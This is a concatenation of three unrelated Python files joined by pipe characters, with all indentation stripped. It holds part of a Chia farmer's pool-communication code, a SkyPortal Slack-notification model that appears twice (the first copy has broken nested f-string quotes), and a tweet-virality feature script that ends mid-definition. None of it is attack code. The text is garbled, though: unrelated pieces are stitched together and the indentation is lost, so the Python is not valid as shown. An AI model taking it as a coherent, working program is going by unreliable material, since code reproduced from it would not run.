# Sends a handshake to the harvester
handshake = harvester_protocol.HarvesterHandshake(
self.get_public_keys(),
self.pool_public_keys,
)
msg = make_msg(ProtocolMessageTypes.harvester_handshake, handshake)
await peer.send_message(msg)
self.harvester_handshake_task = None
if peer.connection_type is NodeType.HARVESTER:
self.plot_sync_receivers[peer.peer_node_id] = Receiver(peer, self.plot_sync_callback)
self.harvester_handshake_task = asyncio.create_task(handshake_task())
def set_server(self, server):
self.server = server
def state_changed(self, change: str, data: Dict[str, Any]):
if self.state_changed_callback is not None:
self.state_changed_callback(change, data)
def handle_failed_pool_response(self, p2_singleton_puzzle_hash: bytes32, error_message: str):
self.log.error(error_message)
self.pool_state[p2_singleton_puzzle_hash]["pool_errors_24h"].append(
ErrorResponse(uint16(PoolErrorCode.REQUEST_FAILED.value), error_message).to_json_dict()
)
def on_disconnect(self, connection: ws.WSChiaConnection):
self.log.info(f"peer disconnected {connection.get_peer_logging()}")
self.state_changed("close_connection", {})
if connection.connection_type is NodeType.HARVESTER:
del self.plot_sync_receivers[connection.peer_node_id]
async def plot_sync_callback(self, peer_id: bytes32, delta: Delta) -> None:
log.info(f"plot_sync_callback: peer_id {peer_id}, delta {delta}")
if not delta.empty():
self.state_changed("new_plots", await self.get_harvesters())
async def _pool_get_pool_info(self, pool_config: PoolWalletConfig) -> Optional[Dict]:
try:
async with aiohttp.ClientSession(trust_env=True) as session:
async with session.get(
f"{pool_config.pool_url}/pool_info", ssl=ssl_context_for_root(get_mozilla_ca_crt(), log=self.log)
) as resp:
if resp.ok:
response: Dict = json.loads(await resp.text())
self.log.info(f"GET /pool_info response: {response}")
return response
else:
self.handle_failed_pool_response(
pool_config.p2_singleton_puzzle_hash,
f"Error in GET /pool_info {pool_config.pool_url}, {resp.status}",
)
except Exception as e:
self.handle_failed_pool_response(
pool_config.p2_singleton_puzzle_hash, f"Exception in GET /pool_info {pool_config.pool_url}, {e}"
)
return None
async def _pool_get_farmer(
self, pool_config: PoolWalletConfig, authentication_token_timeout: uint8, authentication_sk: PrivateKey
) -> Optional[Dict]:
authentication_token = get_current_authentication_token(authentication_token_timeout)
message: bytes32 = std_hash(
AuthenticationPayload(
"get_farmer", pool_config.launcher_id, pool_config.target_puzzle_hash, authentication_token
)
)
signature: G2Element = AugSchemeMPL.sign(authentication_sk, message)
get_farmer_params = {
"launcher_id": pool_config.launcher_id.hex(),
"authentication_token": authentication_token,
"signature": bytes(signature).hex(),
}
try:
async with aiohttp.ClientSession(trust_env=True) as session:
async with session.get(
f"{pool_config.pool_url}/farmer",
params=get_farmer_params,
ssl=ssl_context_for_root(get_mozilla_ca_crt(), log=self.log),
) as resp:
if resp.ok:
response: Dict = json.loads(await resp.text())
log_level = logging.INFO
if "error_code" in response:
log_level = logging.WARNING
self.pool_state[pool_config.p2_singleton_puzzle_hash]["pool_errors_24h"].append(response)
self.log.log(log_level, f"GET /farmer response: {response}")
return response
else:
self.handle_failed_pool_response(
pool_config.p2_singleton_puzzle_hash,
f"Error in GET /farmer {pool_config.pool_url}, {resp.status}",
)
except Exception as e:
self.handle_failed_pool_response(
pool_config.p2_singleton_puzzle_hash, f"Exception in GET /farmer {pool_config.pool_url}, {e}"
)
return None
async def _pool_post_farmer(
self, pool_config: PoolWalletConfig, authentication_token_timeout: uint8, owner_sk: PrivateKey
) -> Optional[Dict]:
auth_sk: Optional[PrivateKey] = self.get_authentication_sk(pool_config)
assert auth_sk is not None
post_farmer_payload: PostFarmerPayload = PostFarmerPayload(
pool_config.launcher_id,
get_current_authentication_token(authentication_token_timeout),
auth_sk.get_g1(),
pool_config.payout_instructions,
None,
)
assert owner_sk.get_g1() == pool_config.owner_public_key
signature: G2Element = AugSchemeMPL.sign(owner_sk, post_farmer_payload.get_hash())
post_farmer_request = PostFarmerRequest(post_farmer_payload, signature)
self.log.debug(f"POST /farmer request {post_farmer_request}")
try:
async with aiohttp.ClientSession() as session:
async with session.post(
f"{pool_config.pool_url}/farmer",
json=post_farmer_request.to_json_dict(),
ssl=ssl_context_for_root(get_mozilla_ca_crt(), log=self.log),
) as resp:
if resp.ok:
response: Dict = json.loads(await resp.text())
log_level = logging.INFO
if "error_code" in response:
log_level = logging.WARNING
self.pool_state[pool_config.p2_singleton_puzzle_hash]["pool_errors_24h"].append(response)
self.log.log(log_level, f"POST /farmer response: {response}")
return response
else:
self.handle_failed_pool_response(
pool_config.p2_singleton_puzzle_hash,
f"Error in POST /farmer {pool_config.pool_url}, {resp.status}",
)
except Exception as e:
self.handle_failed_pool_response(
pool_config.p2_singleton_puzzle_hash, f"Exception in POST /farmer {pool_config.pool_url}, {e}"
)
return None
async def _pool_put_farmer(
self, pool_config: PoolWalletConfig, authentication_token_timeout: uint8, owner_sk: PrivateKey
) -> None:
auth_sk: Optional[PrivateKey] = self.get_authentication_sk(pool_config)
assert auth_sk is not None
put_farmer_payload: PutFarmerPayload = PutFarmerPayload(
pool_config.launcher_id,
get_current_authentication_token(authentication_token_timeout),
auth_sk.get_g1(),
pool_config.payout_instructions,
None,
)
assert owner_sk.get_g1() == pool_config.owner_public_key
signature: G2Element = AugSchemeMPL.sign(owner_sk, put_farmer_payload.get_hash())
put_farmer_request = PutFarmerRequest(put_farmer_payload, signature)
self.log.debug(f"PUT /farmer request {put_farmer_request}")
try:
async with aiohttp.ClientSession() as session:
async with session.put(
f"{pool_config.pool_url}/farmer",
json=put_farmer_request.to_json_dict(),
ssl=ssl_context_for_root(get_mozilla_ca_crt(), log=self.log),
) as resp:
if resp.ok:
response: Dict = json.loads(await resp.text())
log_level = logging.INFO
if "error_code" in response:
log_level = logging.WARNING
self.pool_state[pool_config.p2_singleton_puzzle_hash]["pool_errors_24h"].append(response)
self.log.log(log_level, f"PUT /farmer response: {response}")
else:
self.handle_failed_pool_response(
pool_config.p2_singleton_puzzle_hash,
f"Error in PUT /farmer {pool_config.pool_url}, {resp.status}",
)
except Exception as e:
self.handle_failed_pool_response(
pool_config.p2_singleton_puzzle_hash, f"Exception in PUT /farmer {pool_config.pool_url}, {e}"
)
def get_authentication_sk(self, pool_config: PoolWalletConfig) -> Optional[PrivateKey]:
if pool_config.p2_singleton_puzzle_hash in self.authentication_keys:
return self.authentication_keys[pool_config.p2_singleton_puzzle_hash]
auth_sk: Optional[PrivateKey] = find_authentication_sk(self.all_root_sks, pool_config.owner_public_key)
if auth_sk is not None:
self.authentication_keys[pool_config.p2_singleton_puzzle_hash] = auth_sk
return auth_sk
async def update_pool_state(self):
config = load_config(self._root_path, "config.yaml")
pool_config_list: List[PoolWalletConfig] = load_pool_config(self._root_path)
for pool_config in pool_config_list:
p2_singleton_puzzle_hash = pool_config.p2_singleton_puzzle_hash
try:
authentication_sk: Optional[PrivateKey] = self.get_authentication_sk(pool_config)
if authentication_sk is None:
self.log.error(f"Could not find authentication sk for {p2_singleton_puzzle_hash}")
continue
add_auth_key(self._root_path, pool_config, authentication_sk.get_g1())
if p2_singleton_puzzle_hash not in self.pool_state:
self.pool_state[p2_singleton_puzzle_hash] = {
"points_found_since_start": 0,
"points_found_24h": [],
"points_acknowledged_since_start": 0,
"points_acknowledged_24h": [],
"next_farmer_update": 0,
"next_pool_info_update": 0,
"current_points": 0,
"current_difficulty": None,
"pool_errors_24h": [],
"authentication_token_timeout": None,
}
self.log.info(f"Added pool: {pool_config}")
pool_state = self.pool_state[p2_singleton_puzzle_hash]
pool_state["pool_config"] = pool_config
# Skip state update when self pooling
if pool_config.pool_url == "":
continue
enforce_https = config["full_node"]["selected_network"] == "mainnet"
if enforce_https and not pool_config.pool_url.startswith("https://"):
self.log.error(f"Pool URLs must be HTTPS on mainnet {pool_config.pool_url}")
continue
# TODO: Improve error handling below, inform about unexpected failures
if time.time() >= pool_state["next_pool_info_update"]:
pool_state["next_pool_info_update"] = time.time() + UPDATE_POOL_INFO_INTERVAL
# Makes a GET request to the pool to get the updated information
pool_info = await self._pool_get_pool_info(pool_config)
if pool_info is not None and "error_code" not in pool_info:
pool_state["authentication_token_timeout"] = pool_info["authentication_token_timeout"]
# Only update the first time from GET /pool_info, gets updated from GET /farmer later
if pool_state["current_difficulty"] is None:
pool_state["current_difficulty"] = pool_info["minimum_difficulty"]
if time.time() >= pool_state["next_farmer_update"]:
pool_state["next_farmer_update"] = time.time() + UPDATE_POOL_FARMER_INFO_INTERVAL
authentication_token_timeout = pool_state["authentication_token_timeout"]
async def update_pool_farmer_info() -> Tuple[Optional[GetFarmerResponse], Optional[PoolErrorCode]]:
# Run a GET /farmer to see if the farmer is already known by the pool
response = await self._pool_get_farmer(
pool_config, authentication_token_timeout, authentication_sk
)
farmer_response: Optional[GetFarmerResponse] = None
error_code_response: Optional[PoolErrorCode] = None
if response is not None:
if "error_code" not in response:
farmer_response = GetFarmerResponse.from_json_dict(response)
if farmer_response is not None:
pool_state["current_difficulty"] = farmer_response.current_difficulty
pool_state["current_points"] = farmer_response.current_points
else:
try:
error_code_response = PoolErrorCode(response["error_code"])
except ValueError:
self.log.error(
f"Invalid error code received from the pool: {response['error_code']}"
)
return farmer_response, error_code_response
if authentication_token_timeout is not None:
farmer_info, error_code = await update_pool_farmer_info()
if error_code == PoolErrorCode.FARMER_NOT_KNOWN:
# Make the farmer known on the pool with a POST /farmer
owner_sk_and_index: Optional[PrivateKey, uint32] = find_owner_sk(
self.all_root_sks, pool_config.owner_public_key
)
assert owner_sk_and_index is not None
post_response = await self._pool_post_farmer(
pool_config, authentication_token_timeout, owner_sk_and_index[0]
)
if post_response is not None and "error_code" not in post_response:
self.log.info(
f"Welcome message from {pool_config.pool_url}: "
f"{post_response['welcome_message']}"
)
# Now we should be able to update the local farmer info
farmer_info, farmer_is_known = await update_pool_farmer_info()
if farmer_info is None and not farmer_is_known:
self.log.error("Failed to update farmer info after POST /farmer.")
# Update the farmer information on the pool if the payout instructions changed or if the
# signature is invalid (latter to make sure the pool has the correct authentication public key).
payout_instructions_update_required: bool = (
farmer_info is not None
and pool_config.payout_instructions.lower() != farmer_info.payout_instructions.lower()
)
if payout_instructions_update_required or error_code == PoolErrorCode.INVALID_SIGNATURE:
owner_sk_and_index: Optional[PrivateKey, uint32] = find_owner_sk(
self.all_root_sks, pool_config.owner_public_key
)
assert owner_sk_and_index is not None
await self._pool_put_farmer(
pool_config, authentication_token_timeout, owner_sk_and_index[0]
)
else:
self.log.warning(
f"No pool specific authentication_token_timeout has been set for {p2_singleton_puzzle_hash}"
f", check communication with the pool."
)
except Exception as e:
tb = traceback.format_exc()
self.log.error(f"Exception in update_pool_state for {pool_config.pool_url}, {e} {tb}")
def get_public_keys(self):
return [child_sk.get_g1() for child_sk in self._private_keys]
def get_private_keys(self):
return self._private_keys
async def get_reward_targets(self, search_for_private_key: bool) -> Dict:
if search_for_private_key:
all_sks = await self.get_all_private_keys()
stop_searching_for_farmer, stop_searching_for_pool = False, False
for i in range(500):
if stop_searching_for_farmer and stop_searching_for_pool and i > 0:
break
for sk, _ in all_sks:
ph = create_puzzlehash_for_pk(master_sk_to_wallet_sk(sk, uint32(i)).get_g1())
if ph == self.farmer_target:
stop_searching_for_farmer = True
if ph == self.pool_target:
stop_searching_for_pool = True
return {
"farmer_target": self.farmer_target_encoded,
"pool_target": self.pool_target_encoded,
"have_farmer_sk": stop_searching_for_farmer,
"have_pool_sk": stop_searching_for_pool,
}
return {
"farmer_target": self.farmer_target_encoded,
"pool_target": self.pool_target_encoded,
}
def set_reward_targets(self, farmer_target_encoded: Optional[str], pool_target_encoded: Optional[str]):
with lock_and_load_config(self._root_path, "config.yaml") as config:
if farmer_target_encoded is not None:
self.farmer_target_encoded = farmer_target_encoded
self.farmer_target = decode_puzzle_hash(farmer_target_encoded)
config["farmer"]["xch_target_address"] = farmer_target_encoded
if pool_target_encoded is not None:
self.pool_target_encoded = pool_target_encoded
self.pool_target = decode_puzzle_hash(pool_target_encoded)
config["pool"]["xch_target_address"] = pool_target_encoded
save_config(self._root_path, "config.yaml", config)
async def set_payout_instructions(self, launcher_id: bytes32, payout_instructions: str):
for p2_singleton_puzzle_hash, pool_state_dict in self.pool_state.items():
if launcher_id == pool_state_dict["pool_config"].launcher_id:
with lock_and_load_config(self._root_path, "config.yaml") as config:
new_list = []
pool_list = config["pool"].get("pool_list", [])
if pool_list is not None:
for list_element in pool_list:
if hexstr_to_bytes(list_element["launcher_id"]) == bytes(launcher_id):
list_element["payout_instructions"] = payout_instructions
new_list.append(list_element)
config["pool"]["pool_list"] = new_list
save_config(self._root_path, "config.yaml", config)
# Force a GET /farmer which triggers the PUT /farmer if it detects the changed instructions
pool_state_dict["next_farmer_update"] = 0
return
self.log.warning(f"Launcher id: {launcher_id} not found")
async def generate_login_link(self, launcher_id: bytes32) -> Optional[str]:
for pool_state in self.pool_state.values():
pool_config: PoolWalletConfig = pool_state["pool_config"]
if pool_config.launcher_id == launcher_id:
authentication_sk: Optional[PrivateKey] = self.get_authentication_sk(pool_config)
if authentication_sk is None:
self.log.error(f"Could not find authentication sk for {pool_config.p2_singleton_puzzle_hash}")
continue
authentication_token_timeout = pool_state["authentication_token_timeout"]
authentication_token = get_current_authentication_token(authentication_token_timeout)
message: bytes32 = std_hash(
AuthenticationPayload(
"get_login", pool_config.launcher_id, pool_config.target_puzzle_hash, authentication_token
)
)
signature: G2Element = AugSchemeMPL.sign(authentication_sk, message)
return (
pool_config.pool_url
+ f"/login?launcher_id={launcher_id.hex()}&authentication_token={authentication_token}"
f"&signature={bytes(signature).hex()}"
)
return None
async def get_harvesters(self) -> Dict:
harvesters: List = []
for connection in self.server.get_connections(NodeType.HARVESTER):
self.log.debug(f"get_harvesters host: {connection.peer_host}, node_id: {connection.peer_node_id}")
receiver = self.plot_sync_receivers.get(connection.peer_node_id)
if receiver is not None:
harvesters.append(receiver.to_dict())
else:
self.log.debug(
f"get_harvesters invalid peer: {connection.peer_host}, node_id: {connection.peer_node_id}"
)
return {"harvesters": harvesters}
async def _periodically_update_pool_state_task(self):
time_slept: uint64 = uint64(0)
config_path: Path = config_path_for_filename(self._root_path, "config.yaml")
while not self._shut_down:
# Every time the config file changes, read it to check the pool state
stat_info = config_path.stat()
if stat_info.st_mtime > self.last_config_access_time:
# If we detect the config file changed, refresh private keys first just in case
self.all_root_sks: List[PrivateKey] = [sk for sk, _ in await self.get_all_private_keys()]
self.last_config_access_time = stat_info.st_mtime
await self.update_pool_state()
time_slept = uint64(0)
elif time_slept > 60:
await self.update_pool_state()
time_slept = uint64(0)
time_slept += 1
await asyncio.sleep(1)
async def _periodically_clear_cache_and_refresh_task(self):
time_slept: uint64 = uint64(0)
refresh_slept = 0
while not self._shut_down:
try:
if time_slept > self.constants.SUB_SLOT_TIME_TARGET:
now = time.time()
removed_keys: List[bytes32] = []
for key, add_time in self.cache_add_time.items():
if now - float(add_time) > self.constants.SUB_SLOT_TIME_TARGET * 3:
self.sps.pop(key, None)
self.proofs_of_space.pop(key, None)
self.quality_str_to_identifiers.pop(key, None)
self.number_of_responses.pop(key, None)
removed_keys.append(key)
for key in removed_keys:
self.cache_add_time.pop(key, None)
time_slept = uint64(0)
log.debug(
f"Cleared farmer cache. Num sps: {len(self.sps)} {len(self.proofs_of_space)} "
f"{len(self.quality_str_to_identifiers)} {len(self.number_of_responses)}"
)
time_slept += 1
refresh_slept += 1
# Periodically refresh GUI to show the correct download/upload rate.
if refresh_slept >= 30:
self.state_changed("add_connection", {})
refresh_slept = 0
except Exception:
log.error(f"_periodically_clear_cache_and_refresh_task failed: {traceback.format_exc()}")
await asyncio.sleep(1)
|
__all__ = ['UserNotification']
import json
import sqlalchemy as sa
from sqlalchemy.orm import relationship
from sqlalchemy import event
import requests
from baselayer.app.models import DBSession, Base, User, AccessibleIfUserMatches
from baselayer.app.env import load_env
from baselayer.app.flow import Flow
from ..app_utils import get_app_base_url
from .allocation import Allocation
from .classification import Classification
from .gcn import GcnNotice
from .localization import Localization
from .spectrum import Spectrum
from .comment import Comment
from .listing import Listing
from .facility_transaction import FacilityTransaction
_, cfg = load_env()
class UserNotification(Base):
read = update = delete = AccessibleIfUserMatches('user')
user_id = sa.Column(
sa.ForeignKey("users.id", ondelete="CASCADE"),
nullable=False,
index=True,
doc="ID of the associated User",
)
user = relationship(
"User",
back_populates="notifications",
doc="The associated User",
)
text = sa.Column(
sa.String(),
nullable=False,
doc="The notification text to display",
)
viewed = sa.Column(
sa.Boolean,
nullable=False,
default=False,
index=True,
doc="Boolean indicating whether notification has been viewed.",
)
url = sa.Column(
sa.String(),
nullable=True,
doc="URL to which to direct upon click, if relevant",
)
@event.listens_for(UserNotification, 'after_insert')
def send_slack_notification(mapper, connection, target):
if not target.user:
return
if not target.user.preferences:
return
prefs = target.user.preferences.get('slack_integration')
if not prefs:
return
if prefs.get("active", False):
integration_url = prefs.get("url", "")
else:
return
if not integration_url.startswith(cfg.get("slack.expected_url_preamble", "https")):
return
slack_microservice_url = (
f'http://127.0.0.1:{cfg.get('slack.microservice_port', 64100)}'
)
is_mention = target.text.find("mentioned you") != -1
is_gcnnotice = target.text.find("on GcnEvent") != -1
is_facility_transaction = target.text.find("submission") != -1
if is_mention:
if not target.user.preferences['slack_integration'].get("mentions", False):
return
elif is_gcnnotice:
if not target.user.preferences['slack_integration'].get("gcnnotices", False):
return
elif is_facility_transaction:
if not target.user.preferences['slack_integration'].get(
"facilitytransactions", False
):
return
elif not target.user.preferences['slack_integration'].get(
"favorite_sources", False
):
return
app_url = get_app_base_url()
data = json.dumps(
{"url": integration_url, "text": f'{target.text} ({app_url}{target.url})'}
)
requests.post(
slack_microservice_url, data=data, headers={'Content-Type': 'application/json'}
)
@event.listens_for(Classification, 'after_insert')
@event.listens_for(Spectrum, 'after_insert')
@event.listens_for(Comment, 'after_insert')
@event.listens_for(GcnNotice, 'after_insert')
@event.listens_for(FacilityTransaction, 'after_insert')
def add_user_notifications(mapper, connection, target):
# Add front-end user notifications
@event.listens_for(DBSession(), "after_flush", once=True)
def receive_after_flush(session, context):
is_gcnnotice = "dateobs" in target.to_dict()
is_facility_transaction = "initiator_id" in target.to_dict()
if is_gcnnotice:
users = User.query.filter(
User.preferences["slack_integration"]["gcnnotices"]
.astext.cast(sa.Boolean)
.is_(True)
).all()
elif is_facility_transaction:
users = User.query.filter(
User.preferences["slack_integration"]["facilitytransactions"]
.astext.cast(sa.Boolean)
.is_(True)
).all()
else:
listing_subquery = (
Listing.query.filter(Listing.list_name == "favorites")
.filter(Listing.obj_id == target.obj_id)
.distinct(Listing.user_id)
.subquery()
)
users = (
User.query.join(listing_subquery, User.id == listing_subquery.c.user_id)
.filter(
User.preferences["favorite_sources_activity_notifications"][
target.__tablename__
]
.astext.cast(sa.Boolean)
.is_(True)
)
.all()
)
ws_flow = Flow()
for user in users:
# Only notify users who have read access to the new record in question
if target.__class__.get_if_accessible_by(target.id, user) is not None:
if is_gcnnotice:
session.add(
UserNotification(
user=user,
text=f"New {target.__class__.__name__.lower()} on GcnEvent *{target.dateobs}*",
url=f"/gcn_events/{str(target.dateobs).replace(" ","T")}",
)
)
elif is_facility_transaction:
if "observation_plan_request" in target.to_dict():
allocation_id = target.observation_plan_request.allocation_id
allocation = session.query(Allocation).get(allocation_id)
instrument = allocation.instrument
localization_id = (
target.observation_plan_request.localization_id
)
localization = session.query(Localization).get(localization_id)
session.add(
UserNotification(
user=user,
text=f"New observation plan submission for GcnEvent *{localization.dateobs}* by *{instrument.name}*",
url=f"/gcn_events/{str(localization.dateobs).replace(" ","T")}",
)
)
elif "followup_request" in target.to_dict():
allocation_id = target.followup_request.allocation_id
allocation = session.query(Allocation).get(allocation_id)
instrument = allocation.instrument
session.add(
UserNotification(
user=user,
text=f"New follow-up submission for object *{target.followup_request.obj_id}* by *{instrument.name}*",
url=f"/source/{target.followup_request.obj_id}",
)
)
else:
session.add(
UserNotification(
user=user,
text=f"New {target.__class__.__name__.lower()} on your favorite source *{target.obj_id}*",
url=f"/source/{target.obj_id}",
)
)
ws_flow.push(user.id, "skyportal/FETCH_NOTIFICATIONS")
| __all__ = ['UserNotification']
import json
import sqlalchemy as sa
from sqlalchemy.orm import relationship
from sqlalchemy import event
import requests
from baselayer.app.models import DBSession, Base, User, AccessibleIfUserMatches
from baselayer.app.env import load_env
from baselayer.app.flow import Flow
from ..app_utils import get_app_base_url
from .allocation import Allocation
from .classification import Classification
from .gcn import GcnNotice
from .localization import Localization
from .spectrum import Spectrum
from .comment import Comment
from .listing import Listing
from .facility_transaction import FacilityTransaction
_, cfg = load_env()
class UserNotification(Base):
read = update = delete = AccessibleIfUserMatches('user')
user_id = sa.Column(
sa.ForeignKey("users.id", ondelete="CASCADE"),
nullable=False,
index=True,
doc="ID of the associated User",
)
user = relationship(
"User",
back_populates="notifications",
doc="The associated User",
)
text = sa.Column(
sa.String(),
nullable=False,
doc="The notification text to display",
)
viewed = sa.Column(
sa.Boolean,
nullable=False,
default=False,
index=True,
doc="Boolean indicating whether notification has been viewed.",
)
url = sa.Column(
sa.String(),
nullable=True,
doc="URL to which to direct upon click, if relevant",
)
@event.listens_for(UserNotification, 'after_insert')
def send_slack_notification(mapper, connection, target):
if not target.user:
return
if not target.user.preferences:
return
prefs = target.user.preferences.get('slack_integration')
if not prefs:
return
if prefs.get("active", False):
integration_url = prefs.get("url", "")
else:
return
if not integration_url.startswith(cfg.get("slack.expected_url_preamble", "https")):
return
slack_microservice_url = (
f'http://127.0.0.1:{cfg.get("slack.microservice_port", 64100)}'
)
is_mention = target.text.find("mentioned you") != -1
is_gcnnotice = target.text.find("on GcnEvent") != -1
is_facility_transaction = target.text.find("submission") != -1
if is_mention:
if not target.user.preferences['slack_integration'].get("mentions", False):
return
elif is_gcnnotice:
if not target.user.preferences['slack_integration'].get("gcnnotices", False):
return
elif is_facility_transaction:
if not target.user.preferences['slack_integration'].get(
"facilitytransactions", False
):
return
elif not target.user.preferences['slack_integration'].get(
"favorite_sources", False
):
return
app_url = get_app_base_url()
data = json.dumps(
{"url": integration_url, "text": f'{target.text} ({app_url}{target.url})'}
)
requests.post(
slack_microservice_url, data=data, headers={'Content-Type': 'application/json'}
)
@event.listens_for(Classification, 'after_insert')
@event.listens_for(Spectrum, 'after_insert')
@event.listens_for(Comment, 'after_insert')
@event.listens_for(GcnNotice, 'after_insert')
@event.listens_for(FacilityTransaction, 'after_insert')
def add_user_notifications(mapper, connection, target):
# Add front-end user notifications
@event.listens_for(DBSession(), "after_flush", once=True)
def receive_after_flush(session, context):
is_gcnnotice = "dateobs" in target.to_dict()
is_facility_transaction = "initiator_id" in target.to_dict()
if is_gcnnotice:
users = User.query.filter(
User.preferences["slack_integration"]["gcnnotices"]
.astext.cast(sa.Boolean)
.is_(True)
).all()
elif is_facility_transaction:
users = User.query.filter(
User.preferences["slack_integration"]["facilitytransactions"]
.astext.cast(sa.Boolean)
.is_(True)
).all()
else:
listing_subquery = (
Listing.query.filter(Listing.list_name == "favorites")
.filter(Listing.obj_id == target.obj_id)
.distinct(Listing.user_id)
.subquery()
)
users = (
User.query.join(listing_subquery, User.id == listing_subquery.c.user_id)
.filter(
User.preferences["favorite_sources_activity_notifications"][
target.__tablename__
]
.astext.cast(sa.Boolean)
.is_(True)
)
.all()
)
ws_flow = Flow()
for user in users:
# Only notify users who have read access to the new record in question
if target.__class__.get_if_accessible_by(target.id, user) is not None:
if is_gcnnotice:
session.add(
UserNotification(
user=user,
text=f"New {target.__class__.__name__.lower()} on GcnEvent *{target.dateobs}*",
url=f"/gcn_events/{str(target.dateobs).replace(' ','T')}",
)
)
elif is_facility_transaction:
if "observation_plan_request" in target.to_dict():
allocation_id = target.observation_plan_request.allocation_id
allocation = session.query(Allocation).get(allocation_id)
instrument = allocation.instrument
localization_id = (
target.observation_plan_request.localization_id
)
localization = session.query(Localization).get(localization_id)
session.add(
UserNotification(
user=user,
text=f"New observation plan submission for GcnEvent *{localization.dateobs}* by *{instrument.name}*",
url=f"/gcn_events/{str(localization.dateobs).replace(' ','T')}",
)
)
elif "followup_request" in target.to_dict():
allocation_id = target.followup_request.allocation_id
allocation = session.query(Allocation).get(allocation_id)
instrument = allocation.instrument
session.add(
UserNotification(
user=user,
text=f"New follow-up submission for object *{target.followup_request.obj_id}* by *{instrument.name}*",
url=f"/source/{target.followup_request.obj_id}",
)
)
else:
session.add(
UserNotification(
user=user,
text=f"New {target.__class__.__name__.lower()} on your favorite source *{target.obj_id}*",
url=f"/source/{target.obj_id}",
)
)
ws_flow.push(user.id, "skyportal/FETCH_NOTIFICATIONS")
|
import numpy as np
import pandas as pd
from sklearn.preprocessing import LabelBinarizer
from sklearn.model_selection import StratifiedKFold
from sklearn.preprocessing import StandardScaler
from joblib import parallel_backend
from multiprocessing import cpu_count
import os, gc, joblib
from tqdm import tqdm
from collections import defaultdict
import torch
import warnings
warnings.filterwarnings('ignore')
pd.set_option("display.max_colwidth", 100)
pd.set_option("display.max_rows", 20)
osj = os.path.join; osl = os.listdir
n_cpus = cpu_count()
class ViralDataset(torch.utils.data.Dataset):
def __init__(self, df: pd.DataFrame, feat_cols: list, mode: str):
self.X = df[feat_cols].values # [:,np.newaxis,:]
self.mode = mode
if mode != 'test':
self.targets = df['virality'].values # [:,np.newaxis] # - 1
# assert np.sum(~df['virality'].isin(list(range(5))))==0
def __len__(self):
return len(self.X)
def __getitem__(self, idx):
if self.mode=='test':
return torch.tensor(self.X[idx], dtype=torch.float32)
else:
return (torch.tensor(self.X[idx], dtype=torch.float32),
torch.tensor(self.targets[idx], dtype=torch.long)) # long))
class ExtractFeatsDataset(torch.utils.data.Dataset):
def __init__(self, df: pd.DataFrame, feat_cols: list, target_cols: list, mode: str):
self.X = df[feat_cols].values # [:,np.newaxis,:]
# self.target_cols = target_cols
self.mode = mode
if mode != 'test':
if len(target_cols)==1:
self.targets = df[target_cols[0]].values # [:,np.newaxis] # - 1
self.target_dtype = torch.long
else:
self.targets = df[target_cols].values # [:,np.newaxis] # - 1
self.target_dtype = torch.float32
# assert np.sum(~df['virality'].isin(list(range(5))))==0
def __len__(self):
return len(self.X)
def __getitem__(self, idx):
if self.mode=='test':
return torch.tensor(self.X[idx], dtype=torch.float32)
else:
return (torch.tensor(self.X[idx], dtype=torch.float32),
torch.tensor(self.targets[idx], dtype=self.target_dtype)) # long))
def to_binary_categories(df, cat_col='tweet_language_id'):
df.loc[:, cat_col] = (df[cat_col]!=0).astype(np.int8)
return df
def freq_encoding(df, freq_cols: list, main_col='tweet_id'):
for c in freq_cols:
count_df = df.groupby([c])[main_col].count().reset_index()
count_df.columns = [c, '{}_freq'.format(c)]
df = df.merge(count_df, how='left', on=c)
return df
def bin_feats(df, feats=[], n_bins_default=20):
bin_counts = defaultdict(lambda: n_bins_default)
bin_counts['user_tweet_count'] = 20
for feature in feats:
if '_binned' in feature:
continue
n_bins = bin_counts[feature]
if n_bins:
bins = np.unique(df[feature].quantile(np.linspace(0, 1, n_bins)).values)
df[feature + '_binned'] = pd.cut(
df[feature], bins=bins, duplicates='drop'
).cat.codes
return df
def to_categorical(df):
cat_cols = ['tweet_has_attachment', 'user_has_location', 'user_has_url', 'user_verified', ]
df[cat_cols] = df[cat_cols].astype('category')
return df
def change2float32(df):
float_cols = df.select_dtypes('float64').columns
df[float_cols] = df[float_cols].astype(np.float32)
return df
def merge_df2media(df, df_media):
num_media = (df_media.groupby('tweet_id')['media_id']
.nunique()
.reset_index())
df_media.drop('media_id', axis=1, inplace=True)
num_media.columns = ['tweet_id', 'num_media']
df_media = df_media.merge(num_media, how='left', on='tweet_id')
media_cols = [col for col in df_media if col not in ['tweet_id','media_id']]
df_media = df_media.groupby('tweet_id')[media_cols].mean().reset_index()
# df_media = mean_feats.merge(df_media[['tweet_id']], how='left', on='tweet_id')
# del mean_feats; _ = gc.collect()
df_media['tweet_has_media'] = True
df = df.merge(df_media, how='left', on='tweet_id')
# fillna False if tweet has no media
df['tweet_has_media'] = df['tweet_has_media'].fillna(False)
# the same for the count of number of media per tweet
df['num_media'] = df['num_media'].fillna(0).astype(np.int8)
return df
# def add_num_media_user(df):
# # todo when not debug: df['num_media'].equals(df['num_media_user'])
# num_media_user = df.groupby('tweet_id')['num_media'].sum().reset_index()
# num_media_user.columns = ['tweet_id','num_media_user']
# df = df.merge(num_media_user, how='left', on='tweet_id')
# df['num_media_user'] = df['num_media_user'].astype(np.int8)
# return df
def tweets_user_created_date(df):
for feat_ in ['tweet_created_at_year', 'tweet_created_at_month', 'tweet_created_at_day',
'tweet_created_at_hour']:
# counts_df_cols = ['tweet_user_id']+[f"tweets_in_{feat_.split("_")[-1]}_{time_}" for time_ in np.sort(df[feat_].unique())]
# tweet_user_ids = np.sort(df['tweet_user_id'].unique())
# counts_df = pd.DataFrame(index=range(tweet_user_ids), columns=counts_df_cols)
# counts_df['tweet_user_id'] = tweet_user_ids
counts_map = df.groupby('tweet_user_id')[feat_].apply(lambda x: x.value_counts())
counts_map = counts_map.unstack(level=1)
counts_map.columns = [f"tweets_in_{feat_.split("_")[-1]}_"+str(col) for col in counts_map.columns]
counts_map = counts_map.fillna(0).reset_index()
df = df.merge(counts_map, how='left', on='tweet_user_id')
return df
# n_tweets_time_user = df.groupby('tweet_user_id')[feat_].count().reset_index()
# n_tweets_time_user.columns = ['tweet_user_id', f"n_tweets_{feat_.split("_")[-1]}_user_count"]
# df = df.merge(n_tweets_time_user, how='left', on='tweet_user_id')
def create_date_col(df):
tweet_date_cols = ['tweet_created_at_year', 'tweet_created_at_month', 'tweet_created_at_day']
df['date'] = df[tweet_date_cols].apply(lambda x:
str(x['tweet_created_at_month']).strip() + '/' +
str(x['tweet_created_at_day']).strip() + '/' +
str(x['tweet_created_at_year']).strip(), axis=1)
df['date'] = pd.to_datetime(df['date'])
return df
def add_sincos(df):
